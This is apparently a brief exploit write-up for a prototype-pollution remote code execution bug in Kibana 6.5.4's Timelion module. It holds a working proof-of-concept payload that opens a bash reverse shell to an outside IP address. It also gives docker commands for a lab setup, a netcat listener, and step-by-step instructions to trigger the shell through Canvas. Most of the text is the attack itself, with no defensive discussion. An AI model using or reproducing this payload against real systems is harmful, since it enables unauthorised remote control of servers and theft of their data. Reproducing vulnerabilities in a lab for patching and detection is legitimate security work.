Kibana is an open source analysis and visualization platform that is often used to work with elastic search. Use kibana to search, view, and interact with data stored in the elastic search index.
You can create bar, line, scatter, or pie charts and maps on top of a large amount of data
Kibana also provides a presentation tool called canvas, which allows users to create a slide platform and extract real-time data directly from elastic search.
POC:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
0x01 environment preparation:
- docker pull kibana:6.5.4
docker pull kibana:6.5.4
- docker pull elasticsearch:6.5.4
docker pull elasticsearch:6.5.4
- docker network create somenetwork
docker network create somenetwork
- docker run -d --name kibana --net somenetwork -p 5601:5601 kibana:6.5.4
docker run -d --name kibana --net somenetwork -p 5601:5601 kibana:6.5.4
- docker run -d --name elasticsearch --net somenetwork -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4
docker run -d --name elasticsearch --net somenetwork -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4
0x02 reproduction process:
1. Log in to VPS and listen to the port
nc -l 443
2. Timelion
Access the timelion module, paste POC and click the execute button
3. Canvas
Click the canvas module to trigger the vulnerability and successfully rebound the shell